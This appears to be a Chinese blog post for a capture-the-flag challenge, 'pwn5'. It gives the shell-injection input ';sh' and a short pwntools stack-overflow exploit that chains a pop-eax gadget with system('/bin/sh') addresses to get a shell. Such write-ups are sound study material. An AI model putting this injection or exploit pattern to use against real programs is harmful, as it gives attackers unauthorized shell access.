pwn5

作者: n0va | 来源:发表于2019-03-08 23:37 被阅读0次

跟pwn4很像,但是不一样的是这里的system函数不是系统调用,所以我这里用方法一,直接输入";sh"get shell (应该也是可以用栈溢出做的,因为在文件中还是可以看到"/bin/sh"字符的,但是参数"/bin/sh"的传参会有些不一样,这里我还没着手尝试)
看了一下system函数的汇编,发现system函数调用的参数放在eax寄存器中,所以要找到gadget --pop;eax;ret用来给system函数传参
下面是栈溢出的exp:

from pwn import *
p = process('./pwn5')
# p = remote("pwn.tamuctf.com","4324")
system = 0x804EA90
binsh = 0x80BC140
pop_eax = 0x080b8836
payload = 'a'*0x11 + p32(pop_eax) + p32(binsh) + p32(system)
p.sendline(payload)
p.interactive()

相关文章

  • pwn5

    跟pwn4很像,但是不一样的是这里的system函数不是系统调用,所以我这里用方法一,直接输入";sh"get s...

  • BUUCTF - [第五空间2019 决赛]PWN5

    地址: https://buuoj.cn/challenges#[%E7%AC%AC%E4%BA%94%E7%A9...

网友评论

      本文标题:pwn5

      本文链接:https://www.haomeiwen.com/subject/hedjpqtx.html